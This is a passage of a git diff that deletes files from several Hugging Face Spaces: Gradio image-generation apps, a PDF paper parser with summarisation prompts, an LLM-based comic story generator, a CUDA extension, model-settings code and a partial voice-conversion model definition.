outputs=gr.Image(label='Generated Image'), - title="Our Free Image Creator", - description="

      TIPS:
      To get the best result, read the instructions underneath the App.
      This Free App is slow at producing Images.
      Join us , And get access to this App and many more. They work faster and have more advanced features", - article = "Online App: www.aichatbot.ai").launch(debug=True, max_threads=True) diff --git a/spaces/Danielzero/GPT3.5/modules/pdf_func.py b/spaces/Danielzero/GPT3.5/modules/pdf_func.py deleted file mode 100644 index 0aba6b7b891fc527c79b887256b0cbaa81ae5b3d..0000000000000000000000000000000000000000 --- a/spaces/Danielzero/GPT3.5/modules/pdf_func.py +++ /dev/null @@ -1,180 +0,0 @@ -from types import SimpleNamespace -import pdfplumber -import logging -from llama_index import Document - -def prepare_table_config(crop_page): - """Prepare table查找边界, 要求page为原始page - - From https://github.com/jsvine/pdfplumber/issues/242 - """ - page = crop_page.root_page # root/parent - cs = page.curves + page.edges - def curves_to_edges(): - """See https://github.com/jsvine/pdfplumber/issues/127""" - edges = [] - for c in cs: - edges += pdfplumber.utils.rect_to_edges(c) - return edges - edges = curves_to_edges() - return { - "vertical_strategy": "explicit", - "horizontal_strategy": "explicit", - "explicit_vertical_lines": edges, - "explicit_horizontal_lines": edges, - "intersection_y_tolerance": 10, - } - -def get_text_outside_table(crop_page): - ts = prepare_table_config(crop_page) - if len(ts["explicit_vertical_lines"]) == 0 or len(ts["explicit_horizontal_lines"]) == 0: - return crop_page - - ### Get the bounding boxes of the tables on the page. - bboxes = [table.bbox for table in crop_page.root_page.find_tables(table_settings=ts)] - def not_within_bboxes(obj): - """Check if the object is in any of the table's bbox.""" - def obj_in_bbox(_bbox): - """See https://github.com/jsvine/pdfplumber/blob/stable/pdfplumber/table.py#L404""" - v_mid = (obj["top"] + obj["bottom"]) / 2 - h_mid = (obj["x0"] + obj["x1"]) / 2 - x0, top, x1, bottom = _bbox - return (h_mid >= x0) and (h_mid < x1) and (v_mid >= top) and (v_mid < bottom) - return not any(obj_in_bbox(__bbox) for __bbox in bboxes) - - return crop_page.filter(not_within_bboxes) -# 请使用 LaTeX 表达公式,行内公式以 $ 包裹,行间公式以 $$ 包裹 - -extract_words = lambda page: page.extract_words(keep_blank_chars=True, y_tolerance=0, x_tolerance=1, extra_attrs=["fontname", "size", "object_type"]) -# dict_keys(['text', 'x0', 'x1', 'top', 'doctop', 'bottom', 'upright', 'direction', 'fontname', 'size']) - -def get_title_with_cropped_page(first_page): - title = [] # 处理标题 - x0,top,x1,bottom = first_page.bbox # 获取页面边框 - - for word in extract_words(first_page): - word = SimpleNamespace(**word) - - if word.size >= 14: - title.append(word.text) - title_bottom = word.bottom - elif word.text == "Abstract": # 获取页面abstract - top = word.top - - user_info = [i["text"] for i in extract_words(first_page.within_bbox((x0,title_bottom,x1,top)))] - # 裁剪掉上半部分, within_bbox: full_included; crop: partial_included - return title, user_info, first_page.within_bbox((x0,top,x1,bottom)) - -def get_column_cropped_pages(pages, two_column=True): - new_pages = [] - for page in pages: - if two_column: - left = page.within_bbox((0, 0, page.width/2, page.height),relative=True) - right = page.within_bbox((page.width/2, 0, page.width, page.height), relative=True) - new_pages.append(left) - new_pages.append(right) - else: - new_pages.append(page) - - return new_pages - -def parse_pdf(filename, two_column = True): - level = logging.getLogger().level - if level == logging.getLevelName("DEBUG"): - logging.getLogger().setLevel("INFO") - - with pdfplumber.open(filename) as pdf: - title, user_info, first_page = 
get_title_with_cropped_page(pdf.pages[0]) - new_pages = get_column_cropped_pages([first_page] + pdf.pages[1:], two_column) - - chapters = [] - # tuple (chapter_name, [pageid] (start,stop), chapter_text) - create_chapter = lambda page_start,name_top,name_bottom: SimpleNamespace( - name=[], - name_top=name_top, - name_bottom=name_bottom, - record_chapter_name = True, - - page_start=page_start, - page_stop=None, - - text=[], - ) - cur_chapter = None - - # 按页遍历PDF文档 - for idx, page in enumerate(new_pages): - page = get_text_outside_table(page) - - # 按行遍历页面文本 - for word in extract_words(page): - word = SimpleNamespace(**word) - - # 检查行文本是否以12号字体打印,如果是,则将其作为新章节开始 - if word.size >= 11: # 出现chapter name - if cur_chapter is None: - cur_chapter = create_chapter(page.page_number, word.top, word.bottom) - elif not cur_chapter.record_chapter_name or (cur_chapter.name_bottom != cur_chapter.name_bottom and cur_chapter.name_top != cur_chapter.name_top): - # 不再继续写chapter name - cur_chapter.page_stop = page.page_number # stop id - chapters.append(cur_chapter) - # 重置当前chapter信息 - cur_chapter = create_chapter(page.page_number, word.top, word.bottom) - - # print(word.size, word.top, word.bottom, word.text) - cur_chapter.name.append(word.text) - else: - cur_chapter.record_chapter_name = False # chapter name 结束 - cur_chapter.text.append(word.text) - else: - # 处理最后一个章节 - cur_chapter.page_stop = page.page_number # stop id - chapters.append(cur_chapter) - - for i in chapters: - logging.info(f"section: {i.name} pages:{i.page_start, i.page_stop} word-count:{len(i.text)}") - logging.debug(" ".join(i.text)) - - title = " ".join(title) - user_info = " ".join(user_info) - text = f"Article Title: {title}, Information:{user_info}\n" - for idx, chapter in enumerate(chapters): - chapter.name = " ".join(chapter.name) - text += f"The {idx}th Chapter {chapter.name}: " + " ".join(chapter.text) + "\n" - - logging.getLogger().setLevel(level) - return Document(text=text, extra_info={"title": title}) - -BASE_POINTS = """ -1. Who are the authors? -2. What is the process of the proposed method? -3. What is the performance of the proposed method? Please note down its performance metrics. -4. What are the baseline models and their performances? Please note down these baseline methods. -5. What dataset did this paper use? -""" - -READING_PROMPT = """ -You are a researcher helper bot. You can help the user with research paper reading and summarizing. \n -Now I am going to send you a paper. You need to read it and summarize it for me part by part. \n -When you are reading, You need to focus on these key points:{} -""" - -READING_PROMT_V2 = """ -You are a researcher helper bot. You can help the user with research paper reading and summarizing. \n -Now I am going to send you a paper. You need to read it and summarize it for me part by part. \n -When you are reading, You need to focus on these key points:{}, - -And You need to generate a brief but informative title for this part. -Your return format: -- title: '...' -- summary: '...' -""" - -SUMMARY_PROMPT = "You are a researcher helper bot. Now you need to read the summaries of a research paper." 
- - -if __name__ == '__main__': - # Test code - z = parse_pdf("./build/test.pdf") - print(z["user_info"]) - print(z["title"]) \ No newline at end of file diff --git a/spaces/Detomo/ai-comic-generation/src/app/queries/getStory.ts b/spaces/Detomo/ai-comic-generation/src/app/queries/getStory.ts deleted file mode 100644 index 8d1525b6289da05ab24eb2386fd99b7e5367581d..0000000000000000000000000000000000000000 --- a/spaces/Detomo/ai-comic-generation/src/app/queries/getStory.ts +++ /dev/null @@ -1,83 +0,0 @@ -import { createLlamaPrompt } from "@/lib/createLlamaPrompt" -import { dirtyLLMResponseCleaner } from "@/lib/dirtyLLMResponseCleaner" -import { dirtyLLMJsonParser } from "@/lib/dirtyLLMJsonParser" -import { dirtyCaptionCleaner } from "@/lib/dirtyCaptionCleaner" - -import { predict } from "./predict" -import { Preset } from "../engine/presets" -import { LLMResponse } from "@/types" -import { cleanJson } from "@/lib/cleanJson" - -export const getStory = async ({ - preset, - prompt = "", -}: { - preset: Preset; - prompt: string; -}): Promise => { - - const query = createLlamaPrompt([ - { - role: "system", - content: [ - `You are a comic book author specialized in ${preset.llmPrompt}`, - `Please write detailed drawing instructions and a one-sentence short caption for the 4 panels of a new silent comic book page.`, - `Give your response as a JSON array like this: \`Array<{ panel: number; instructions: string; caption: string}>\`.`, - // `Give your response as Markdown bullet points.`, - `Be brief in your 4 instructions and captions, don't add your own comments. Be straight to the point, and never reply things like "Sure, I can.." etc.` - ].filter(item => item).join("\n") - }, - { - role: "user", - content: `The story is: ${prompt}`, - } - ]) + "```json\n[" - - - let result = "" - - try { - result = `${await predict(query) || ""}`.trim() - if (!result.length) { - throw new Error("empty result!") - } - } catch (err) { - console.log(`prediction of the story failed, trying again..`) - try { - result = `${await predict(query+".") || ""}`.trim() - if (!result.length) { - throw new Error("empty result!") - } - } catch (err) { - console.error(`prediction of the story failed again!`) - throw new Error(`failed to generate the story ${err}`) - } - } - - // console.log("Raw response from LLM:", result) - const tmp = cleanJson(result) - - let llmResponse: LLMResponse = [] - - try { - llmResponse = dirtyLLMJsonParser(tmp) - } catch (err) { - console.log(`failed to read LLM response: ${err}`) - console.log(`original response was:`, result) - - // in case of failure here, it might be because the LLM hallucinated a completely different response, - // such as markdown. There is no real solution.. but we can try a fallback: - - llmResponse = ( - tmp.split("*") - .map(item => item.trim()) - .map((cap, i) => ({ - panel: i, - caption: cap, - instructions: cap, - })) - ) - } - - return llmResponse.map(res => dirtyCaptionCleaner(res)) -} \ No newline at end of file diff --git a/spaces/DragGan/DragGan-Inversion/PTI/torch_utils/ops/bias_act.cpp b/spaces/DragGan/DragGan-Inversion/PTI/torch_utils/ops/bias_act.cpp deleted file mode 100644 index 5d2425d8054991a8e8b6f7a940fd0ff7fa0bb330..0000000000000000000000000000000000000000 --- a/spaces/DragGan/DragGan-Inversion/PTI/torch_utils/ops/bias_act.cpp +++ /dev/null @@ -1,99 +0,0 @@ -// Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. 
-// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -#include -#include -#include -#include "bias_act.h" - -//------------------------------------------------------------------------ - -static bool has_same_layout(torch::Tensor x, torch::Tensor y) -{ - if (x.dim() != y.dim()) - return false; - for (int64_t i = 0; i < x.dim(); i++) - { - if (x.size(i) != y.size(i)) - return false; - if (x.size(i) >= 2 && x.stride(i) != y.stride(i)) - return false; - } - return true; -} - -//------------------------------------------------------------------------ - -static torch::Tensor bias_act(torch::Tensor x, torch::Tensor b, torch::Tensor xref, torch::Tensor yref, torch::Tensor dy, int grad, int dim, int act, float alpha, float gain, float clamp) -{ - // Validate arguments. - TORCH_CHECK(x.is_cuda(), "x must reside on CUDA device"); - TORCH_CHECK(b.numel() == 0 || (b.dtype() == x.dtype() && b.device() == x.device()), "b must have the same dtype and device as x"); - TORCH_CHECK(xref.numel() == 0 || (xref.sizes() == x.sizes() && xref.dtype() == x.dtype() && xref.device() == x.device()), "xref must have the same shape, dtype, and device as x"); - TORCH_CHECK(yref.numel() == 0 || (yref.sizes() == x.sizes() && yref.dtype() == x.dtype() && yref.device() == x.device()), "yref must have the same shape, dtype, and device as x"); - TORCH_CHECK(dy.numel() == 0 || (dy.sizes() == x.sizes() && dy.dtype() == x.dtype() && dy.device() == x.device()), "dy must have the same dtype and device as x"); - TORCH_CHECK(x.numel() <= INT_MAX, "x is too large"); - TORCH_CHECK(b.dim() == 1, "b must have rank 1"); - TORCH_CHECK(b.numel() == 0 || (dim >= 0 && dim < x.dim()), "dim is out of bounds"); - TORCH_CHECK(b.numel() == 0 || b.numel() == x.size(dim), "b has wrong number of elements"); - TORCH_CHECK(grad >= 0, "grad must be non-negative"); - - // Validate layout. - TORCH_CHECK(x.is_non_overlapping_and_dense(), "x must be non-overlapping and dense"); - TORCH_CHECK(b.is_contiguous(), "b must be contiguous"); - TORCH_CHECK(xref.numel() == 0 || has_same_layout(xref, x), "xref must have the same layout as x"); - TORCH_CHECK(yref.numel() == 0 || has_same_layout(yref, x), "yref must have the same layout as x"); - TORCH_CHECK(dy.numel() == 0 || has_same_layout(dy, x), "dy must have the same layout as x"); - - // Create output tensor. - const at::cuda::OptionalCUDAGuard device_guard(device_of(x)); - torch::Tensor y = torch::empty_like(x); - TORCH_CHECK(has_same_layout(y, x), "y must have the same layout as x"); - - // Initialize CUDA kernel parameters. - bias_act_kernel_params p; - p.x = x.data_ptr(); - p.b = (b.numel()) ? b.data_ptr() : NULL; - p.xref = (xref.numel()) ? xref.data_ptr() : NULL; - p.yref = (yref.numel()) ? yref.data_ptr() : NULL; - p.dy = (dy.numel()) ? dy.data_ptr() : NULL; - p.y = y.data_ptr(); - p.grad = grad; - p.act = act; - p.alpha = alpha; - p.gain = gain; - p.clamp = clamp; - p.sizeX = (int)x.numel(); - p.sizeB = (int)b.numel(); - p.stepB = (b.numel()) ? (int)x.stride(dim) : 1; - - // Choose CUDA kernel. 
- void* kernel; - AT_DISPATCH_FLOATING_TYPES_AND_HALF(x.scalar_type(), "upfirdn2d_cuda", [&] - { - kernel = choose_bias_act_kernel(p); - }); - TORCH_CHECK(kernel, "no CUDA kernel found for the specified activation func"); - - // Launch CUDA kernel. - p.loopX = 4; - int blockSize = 4 * 32; - int gridSize = (p.sizeX - 1) / (p.loopX * blockSize) + 1; - void* args[] = {&p}; - AT_CUDA_CHECK(cudaLaunchKernel(kernel, gridSize, blockSize, args, 0, at::cuda::getCurrentCUDAStream())); - return y; -} - -//------------------------------------------------------------------------ - -PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) -{ - m.def("bias_act", &bias_act); -} - -//------------------------------------------------------------------------ diff --git a/spaces/Duskfallcrew/duskfall-s-vaporwave-aesthetic/app.py b/spaces/Duskfallcrew/duskfall-s-vaporwave-aesthetic/app.py deleted file mode 100644 index f1610d96045689eac49dae76c65bdcc196370365..0000000000000000000000000000000000000000 --- a/spaces/Duskfallcrew/duskfall-s-vaporwave-aesthetic/app.py +++ /dev/null @@ -1,137 +0,0 @@ -from diffusers import StableDiffusionPipeline, StableDiffusionImg2ImgPipeline, DPMSolverMultistepScheduler -import gradio as gr -import torch -from PIL import Image - -model_id = 'Duskfallcrew/duskfall-s-vaporwave-aesthetic' -prefix = 'vapodusk1' - -scheduler = DPMSolverMultistepScheduler.from_pretrained(model_id, subfolder="scheduler") - -pipe = StableDiffusionPipeline.from_pretrained( - model_id, - torch_dtype=torch.float16 if torch.cuda.is_available() else torch.float32, - scheduler=scheduler) - -pipe_i2i = StableDiffusionImg2ImgPipeline.from_pretrained( - model_id, - torch_dtype=torch.float16 if torch.cuda.is_available() else torch.float32, - scheduler=scheduler) - -if torch.cuda.is_available(): - pipe = pipe.to("cuda") - pipe_i2i = pipe_i2i.to("cuda") - -def error_str(error, title="Error"): - return f"""#### {title} - {error}""" if error else "" - -def inference(prompt, guidance, steps, width=512, height=512, seed=0, img=None, strength=0.5, neg_prompt="", auto_prefix=False): - - generator = torch.Generator('cuda').manual_seed(seed) if seed != 0 else None - prompt = f"{prefix} {prompt}" if auto_prefix else prompt - - try: - if img is not None: - return img_to_img(prompt, neg_prompt, img, strength, guidance, steps, width, height, generator), None - else: - return txt_to_img(prompt, neg_prompt, guidance, steps, width, height, generator), None - except Exception as e: - return None, error_str(e) - -def txt_to_img(prompt, neg_prompt, guidance, steps, width, height, generator): - - result = pipe( - prompt, - negative_prompt = neg_prompt, - num_inference_steps = int(steps), - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return result.images[0] - -def img_to_img(prompt, neg_prompt, img, strength, guidance, steps, width, height, generator): - - ratio = min(height / img.height, width / img.width) - img = img.resize((int(img.width * ratio), int(img.height * ratio)), Image.LANCZOS) - result = pipe_i2i( - prompt, - negative_prompt = neg_prompt, - init_image = img, - num_inference_steps = int(steps), - strength = strength, - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return result.images[0] - -css = """.main-div div{display:inline-flex;align-items:center;gap:.8rem;font-size:1.75rem}.main-div div h1{font-weight:900;margin-bottom:7px}.main-div 
p{margin-bottom:10px;font-size:94%}a{text-decoration:underline}.tabs{margin-top:0;margin-bottom:0}#gallery{min-height:20rem} -""" -with gr.Blocks(css=css) as demo: - gr.HTML( - f""" -

      Duskfall S Vaporwave Aesthetic


      - Demo for the Duskfall S Vaporwave Aesthetic Stable Diffusion model. All samples and info are here: https://civitai.com/user/duskfallcrew. If you want to donate towards costs and don't want to subscribe: https://ko-fi.com/DUSKFALLcrew. If you want to support the EARTH & DUSK media projects monthly, and not just the AI work: https://www.patreon.com/earthndusk - √ Use "vapodusk1" in your prompts!
      - {"Add the following tokens to your prompts for the model to work properly: prefix" if prefix else ""} -

      - Running on {"GPU 🔥" if torch.cuda.is_available() else f"CPU 🥶. For faster inference it is recommended to upgrade to GPU in Settings"} after duplicating the space

      - Duplicate Space -
      - """ - ) - with gr.Row(): - - with gr.Column(scale=55): - with gr.Group(): - with gr.Row(): - prompt = gr.Textbox(label="Prompt", show_label=False, max_lines=2,placeholder=f"{prefix} [your prompt]").style(container=False) - generate = gr.Button(value="Generate").style(rounded=(False, True, True, False)) - - image_out = gr.Image(height=512) - error_output = gr.Markdown() - - with gr.Column(scale=45): - with gr.Tab("Options"): - with gr.Group(): - neg_prompt = gr.Textbox(label="Negative prompt", placeholder="What to exclude from the image") - auto_prefix = gr.Checkbox(label="Prefix styling tokens automatically (vapodusk1)", value=prefix, visible=prefix) - - with gr.Row(): - guidance = gr.Slider(label="Guidance scale", value=7.5, maximum=15) - steps = gr.Slider(label="Steps", value=25, minimum=2, maximum=75, step=1) - - with gr.Row(): - width = gr.Slider(label="Width", value=512, minimum=64, maximum=1024, step=8) - height = gr.Slider(label="Height", value=512, minimum=64, maximum=1024, step=8) - - seed = gr.Slider(0, 2147483647, label='Seed (0 = random)', value=0, step=1) - - with gr.Tab("Image to image"): - with gr.Group(): - image = gr.Image(label="Image", height=256, tool="editor", type="pil") - strength = gr.Slider(label="Transformation strength", minimum=0, maximum=1, step=0.01, value=0.5) - - auto_prefix.change(lambda x: gr.update(placeholder=f"{prefix} [your prompt]" if x else "[Your prompt]"), inputs=auto_prefix, outputs=prompt, queue=False) - - inputs = [prompt, guidance, steps, width, height, seed, image, strength, neg_prompt, auto_prefix] - outputs = [image_out, error_output] - prompt.submit(inference, inputs=inputs, outputs=outputs) - generate.click(inference, inputs=inputs, outputs=outputs) - - gr.HTML(""" -

      This space was created using SD Space Creator.

      - """) - -demo.queue(concurrency_count=1) -demo.launch() diff --git a/spaces/ECCV2022/bytetrack/README.md b/spaces/ECCV2022/bytetrack/README.md deleted file mode 100644 index 07e8c5bce0cb37a34864eabe30d822aa1c61e90f..0000000000000000000000000000000000000000 --- a/spaces/ECCV2022/bytetrack/README.md +++ /dev/null @@ -1,38 +0,0 @@ ---- -title: Bytetrack -emoji: 🏢 -colorFrom: blue -colorTo: blue -sdk: gradio -sdk_version: 3.1.1 -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/Emanuel/porttagger/README.md b/spaces/Emanuel/porttagger/README.md deleted file mode 100644 index aa57d08992dcf15a73404d4a5460da2de86b4693..0000000000000000000000000000000000000000 --- a/spaces/Emanuel/porttagger/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Porttagger -emoji: ✍️ -colorFrom: purple -colorTo: purple -sdk: gradio -sdk_version: 3.9.1 -app_file: app.py -pinned: true -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/EsoCode/text-generation-webui/modules/models_settings.py b/spaces/EsoCode/text-generation-webui/modules/models_settings.py deleted file mode 100644 index 0207e7de76e54f438ee98d3b4e8344446796dd47..0000000000000000000000000000000000000000 --- a/spaces/EsoCode/text-generation-webui/modules/models_settings.py +++ /dev/null @@ -1,134 +0,0 @@ -import re -from pathlib import Path - -import yaml - -from modules import shared, ui - - -def get_model_settings_from_yamls(model): - settings = shared.model_config - model_settings = {} - for pat in settings: - if re.match(pat.lower(), model.lower()): - for k in settings[pat]: - model_settings[k] = settings[pat][k] - - return model_settings - - -def infer_loader(model_name): - path_to_model = Path(f'{shared.args.model_dir}/{model_name}') - model_settings = get_model_settings_from_yamls(model_name) - if not path_to_model.exists(): - loader = None - elif Path(f'{shared.args.model_dir}/{model_name}/quantize_config.json').exists() or ('wbits' in model_settings and type(model_settings['wbits']) is int and model_settings['wbits'] > 0): - loader = 'AutoGPTQ' - elif len(list(path_to_model.glob('*ggml*.bin'))) > 0: - loader = 'llama.cpp' - elif re.match('.*ggml.*\.bin', model_name.lower()): - loader = 'llama.cpp' - elif re.match('.*rwkv.*\.pth', model_name.lower()): - loader = 'RWKV' - elif shared.args.flexgen: - loader = 'FlexGen' - else: - loader = 'Transformers' - - return loader - - -# UI: update the command-line arguments based on the interface values -def update_model_parameters(state, initial=False): - elements = ui.list_model_elements() # the names of the parameters - gpu_memories = [] - - for i, element in enumerate(elements): - if element not in state: - continue - - value 
= state[element] - if element.startswith('gpu_memory'): - gpu_memories.append(value) - continue - - if initial and vars(shared.args)[element] != vars(shared.args_defaults)[element]: - continue - - # Setting null defaults - if element in ['wbits', 'groupsize', 'model_type'] and value == 'None': - value = vars(shared.args_defaults)[element] - elif element in ['cpu_memory'] and value == 0: - value = vars(shared.args_defaults)[element] - - # Making some simple conversions - if element in ['wbits', 'groupsize', 'pre_layer']: - value = int(value) - elif element == 'cpu_memory' and value is not None: - value = f"{value}MiB" - - if element in ['pre_layer']: - value = [value] if value > 0 else None - - setattr(shared.args, element, value) - - found_positive = False - for i in gpu_memories: - if i > 0: - found_positive = True - break - - if not (initial and vars(shared.args)['gpu_memory'] != vars(shared.args_defaults)['gpu_memory']): - if found_positive: - shared.args.gpu_memory = [f"{i}MiB" for i in gpu_memories] - else: - shared.args.gpu_memory = None - - -# UI: update the state variable with the model settings -def apply_model_settings_to_state(model, state): - model_settings = get_model_settings_from_yamls(model) - if 'loader' not in model_settings: - loader = infer_loader(model) - if 'wbits' in model_settings and type(model_settings['wbits']) is int and model_settings['wbits'] > 0: - loader = 'AutoGPTQ' - - # If the user is using an alternative GPTQ loader, let them keep using it - if not (loader == 'AutoGPTQ' and state['loader'] in ['GPTQ-for-LLaMa', 'ExLlama', 'ExLlama_HF']): - state['loader'] = loader - - for k in model_settings: - if k in state: - state[k] = model_settings[k] - - return state - - -# Save the settings for this model to models/config-user.yaml -def save_model_settings(model, state): - if model == 'None': - yield ("Not saving the settings because no model is loaded.") - return - - with Path(f'{shared.args.model_dir}/config-user.yaml') as p: - if p.exists(): - user_config = yaml.safe_load(open(p, 'r').read()) - else: - user_config = {} - - model_regex = model + '$' # For exact matches - for _dict in [user_config, shared.model_config]: - if model_regex not in _dict: - _dict[model_regex] = {} - - if model_regex not in user_config: - user_config[model_regex] = {} - - for k in ui.list_model_elements(): - user_config[model_regex][k] = state[k] - shared.model_config[model_regex][k] = state[k] - - with open(p, 'w') as f: - f.write(yaml.dump(user_config, sort_keys=False)) - - yield (f"Settings for {model} saved to {p}") diff --git a/spaces/Faridmaruf/rvc-genshin-v2/lib/infer_pack/models_onnx.py b/spaces/Faridmaruf/rvc-genshin-v2/lib/infer_pack/models_onnx.py deleted file mode 100644 index 963e67b29f828e9fdd096397952054fe77cf3d10..0000000000000000000000000000000000000000 --- a/spaces/Faridmaruf/rvc-genshin-v2/lib/infer_pack/models_onnx.py +++ /dev/null @@ -1,819 +0,0 @@ -import math, pdb, os -from time import time as ttime -import torch -from torch import nn -from torch.nn import functional as F -from lib.infer_pack import modules -from lib.infer_pack import attentions -from lib.infer_pack import commons -from lib.infer_pack.commons import init_weights, get_padding -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from lib.infer_pack.commons import init_weights -import numpy as np -from lib.infer_pack import commons - - -class TextEncoder256(nn.Module): - def __init__( - self, - out_channels, - 
hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class TextEncoder768(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(768, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0, - ): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - def remove_weight_norm(self): - for i in 
range(self.n_flows): - self.flows[i * 2].remove_weight_norm() - - -class PosteriorEncoder(nn.Module): - def __init__( - self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - def remove_weight_norm(self): - self.enc.remove_weight_norm() - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) 